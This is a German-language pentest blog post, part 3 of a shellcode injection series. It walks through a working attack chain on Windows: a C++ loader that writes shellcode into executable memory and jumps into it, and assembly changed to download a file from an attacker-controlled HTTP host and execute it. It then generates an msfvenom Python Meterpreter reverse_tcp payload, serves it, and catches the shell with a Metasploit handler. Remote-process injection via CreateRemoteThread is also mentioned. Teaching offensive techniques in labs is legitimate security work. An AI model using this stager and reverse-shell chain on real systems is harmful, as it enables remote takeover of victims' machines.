{{tag>IT-Security Windows Kali pentest blog deutsch}} ====== Shellcode Injection Teil 3 ====== {{:it-security:blog:shellcode-part-3.png?400|}} In der Regel werden Shellcode Injections dazu benutzt, eine Reverse Shell zu initiieren. Jedoch kann es unter manchen Umständen nötig sein, den Code für die Shell erst im zweiten Schritt zu laden. In diesem Blogpost zeige ich, wie wir eine Shellcode Injection nutzen können, um eine Datei mittels HTTP zu laden und anschließend auszuführen. \\ \\ ===== Code ===== ==== C++ Programm ==== Als erstes brauchen wir ein kleines Programm, welches den Shellcode in den Speicher lädt und anschließend in diesen hineinspringt. ... //buf ist der Shellcode unsigned char buf[] = "\xeb\x74\x31\...\x69\x70\x00"; int main(int argc, char** argv) { ... //Speicherbereich adressieren void* stage = VirtualAlloc(0, 0x1000, 0x1000, 0x40); void (*target)(); ... //Shellcode in den Speicher verschieben memmove(stage, buf, 0x1000); ... //Verschiebe die Shellcode Adresse nach eax und springe dorthin __asm { mov eax, target jmp eax } } Den kompletten Code findet Ihr im [[https://github.com/psycore8/nosoc-shellcode/tree/main/nosoc-shellcode-3|Repository]]. \\ \\ ==== Assembly ==== Einen gut dokumentierten Assembler Code finden wir im [[https://github.com/stephenbradshaw/shellcode/blob/master/descript.asm|Repository von Stephen Bradshaw]]. === Assembly anpassen === Der Code führt eine heruntergeladene VBS Datei aus. Wir wollen jedoch ein Python Script starten, welches eine Meterpreter Shell erzeugt. Hierzu ändern wir folgende Stellen: ;Zeile 143 / +7 markiert den Anfang des Dateinamens (WindowsAgent.py) lea edx, [esi + 7] ;Zeile 184 / Befehlszeile, die ausgeführt werden soll db "python WindowsAgent.py", 0 ;Zeile 192 / Unsere URL db "http://172.26.72.38/nat.zip", 0 \\ \\ === Shellcode erstellen === Den Shellcode müssen wir als ''%%x86 Windows%%'' Binärdatei ausgeben. Dies machen wir mit ''%%nasm%%'': nasm -f win32 download.asm -o shellcode.o Das Binary lassen wir uns nun ''%%C++%%'' freundlich anzeigen: objdump -D ./shellcode.o |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g' Die Ausgabe nutzen wir als Shellcode in unserem ''%%C++%%'' Code und kompilieren unser Projekt. \\ \\ === Shellcode testen === Um den Shellcode zu verstehen, debuggen wir anschließend das Programm. Wir suchen den Aufruf der Funktion ''%%main()%%'' {{:it-security:blog:2024-120 -1.png}} Von ''%%main()%%'' aus suchen wir den Sprung in den Shellcode Speicherbereich. In unserem Programm haben wir diesen mit Inline Assembly realisiert: ''%%call eax%%''. Dies sieht im Debugger so aus: {{:it-security:blog:2024-120 -2.png}} Springen wir nun rein, sehen wir unseren Shellcode: {{:it-security:blog:2024-120 -3.png}} Von hier aus können wir die Prozeduren verstehen und testen. \\ \\ ===== Payload ===== ==== Meterpreter Payload vorbereiten ==== Wie Eingangs erwähnt, wollen wir eine Meterpreter Shell mittels Python erzeugen. Also benötigen wir einen entsprechenden Payload. Diesen erzeugen wir uns mit ''%%msfvenom%%''. msfvenom -p python/meterpreter/reverse_tcp LHOST=172.26.72.38 LPORT=4500 > payload.py Der Shellcode lädt die Datei ''%%nat.zip%%'' von einem HTTP Server herunter, speichert diese als ''%%WindowsAgent.py%%'' und führt sie dann aus. Also bereiten wir dies entsprechend vor: cp payload.py nat.zip python -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... Zu guter Letzt benötigen wir noch einen Metasploit Handler, welcher unsere Shell entgegen nimmt. Dieser kann über das Script ''%%nosoc3.rc%%'' gestartet werden: msf6 > resource nosoc3.rc [*] Processing /home/kali/nosoc3.rc for ERB directives. resource (/home/kali/nosoc3.rc)> use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp resource (/home/kali/nosoc3.rc)> set payload python/meterpreter/reverse_tcp payload => python/meterpreter/reverse_tcp resource (/home/kali/nosoc3.rc)> set lhost 0.0.0.0 lhost => 0.0.0.0 resource (/home/kali/nosoc3.rc)> set lport 4500 lport => 4500 resource (/home/kali/nosoc3.rc)> run [*] Started reverse TCP handler on 0.0.0.0:4500 Nun ist alles bereit. \\ \\ ==== Angriff ==== Starten wir nun das Programm auf dem Ziel PC. {{:it-security:blog:2024-120 -4.png}} Das Python Script wird heruntergeladen: {{:it-security:blog:2024-120 -5.png}} Und schließlich werden wir von einer Meterpreter Shell begrüßt: {{:it-security:blog:2024-120 -6.png}} \\ \\ ===== CreateRemoteThread ===== Wir können den Shellcode natürlich auch in fremde Prozesse injizieren. Ein Beispielprogramm hierzu gibt es auch im Repository. Zum Starten muss die Ziel PID als Argument übergeben werden: RemoteInject.exe 10001 \\ \\ ===== Repository ===== git clone https://github.com/psycore8/nosoc-shellcode ~~DISCUSSION~~